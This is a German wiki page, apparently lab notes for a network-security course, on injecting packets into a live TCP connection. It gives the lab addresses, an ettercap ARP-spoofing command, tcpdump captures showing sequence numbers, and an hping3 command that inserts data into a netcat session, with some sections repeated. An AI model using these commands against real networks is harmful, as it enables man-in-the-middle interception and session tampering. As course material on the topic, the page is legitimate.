Pakete in Verbindung schicken: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 25: | Zeile 25: | ||
*nc -lp 2020 | *nc -lp 2020 | ||
=ANGREIFER= | =ANGREIFER= | ||
| − | |||
==fenster client zwei== | ==fenster client zwei== | ||
Version vom 5. Juli 2021, 13:33 Uhr
Vorraussetzung
Versuchsaufbau
- CLIENT=10.0.10.103
- OPFER=10.0.10.104
- ANGREIFER=10.0.10.101
- DSTPORT=2020
![Bearbeiten](javascript:editDrawio("1540950210", "hacking-1.drawio.png", "png", false, false, false, true, "https://embed.diagrams.net")){kind=link}
Angreifer
- Auf Angreifer brauchen wir 2 Terminals
Terminal 1
- Variablen setzen
- CLIENT=10.0.10.103
- OPFER=10.0.10.104
- ANGREIFER=10.0.10.101
- DSTPORT=2020
- Arp Spoofing
- ettercap -Tq -i eth0 -M arp /$CLIENT,$OPFER// /$OPFER,$CLIENT//
Terminal 2
- tcpdump -ni eth0 -S host 10.0.10.104 and tcp
- Wir suchen SEQ, ACK und SRCPORT
OPFER
- nc -lp 2020
ANGREIFER
fenster client zwei
- client
thomas.will@cardassia ~ $ nc 192.168.244.52 2020
fenster client eins
cardassia ~ # tcpdump -ni lan -S port 2020 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes 15:26:44.663526 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [S], seq 1758983238, win 29200, options [mss 1460,sackOK,TS val 2268763 ecr 0,nop,wscale 7], length 0 15:26:44.663980 IP 192.168.244.52.2020 > 192.168.244.1.58257: Flags [S.], seq 963043879, ack 1758983239, win 28960, options [mss 1460,sackOK,TS val 193210349 ecr 2268763,nop,wscale 7], length 0 15:26:44.664035 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], ack 963043880, win 229, options [nop,nop,TS val 2268763 ecr 193210349], length 0
fenster client drei
datei erstellen 10 bytes mit Umbruch
cardassia ~ # echo "hallo tux" > data.dat cardassia ~ # hping3 -s 58257 -p 2020 -A -d 10 -E data.dat -c 1 -M 1758983239 -L 963043880 192.168.244.52
Links
- https://www.rationallyparanoid.com/articles/hping.html
- http://www.eggdrop.ch/texts/hping/#2_1
- http://0daysecurity.com/articles/hping3_examples.html
- http://maintain-under-the-radar.org/index.php/security/terminologie/scannen-von-netzwerken
Angreifer
fenster client eins
- tcpdump
cardassia ~ # tcpdump -ni lan -S port 2020 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes
fenster client zwei
- client
thomas.will@cardassia ~ $ nc 192.168.244.52 2020
fenster client eins
cardassia ~ # tcpdump -ni lan -S port 2020 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lan, link-type EN10MB (Ethernet), capture size 65535 bytes 15:26:44.663526 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [S], seq 1758983238, win 29200, options [mss 1460,sackOK,TS val 2268763 ecr 0,nop,wscale 7], length 0 15:26:44.663980 IP 192.168.244.52.2020 > 192.168.244.1.58257: Flags [S.], seq 963043879, ack 1758983239, win 28960, options [mss 1460,sackOK,TS val 193210349 ecr 2268763,nop,wscale 7], length 0 15:26:44.664035 IP 192.168.244.1.58257 > 192.168.244.52.2020: Flags [.], ack 963043880, win 229, options [nop,nop,TS val 2268763 ecr 193210349], length 0
fenster client drei
datei erstellen 10 bytes mit Umbruch
cardassia ~ # echo "hallo tux" > data.dat cardassia ~ # hping3 -s 58257 -p 2020 -A -d 10 -E data.dat -c 1 -M 1758983239 -L 963043880 192.168.244.52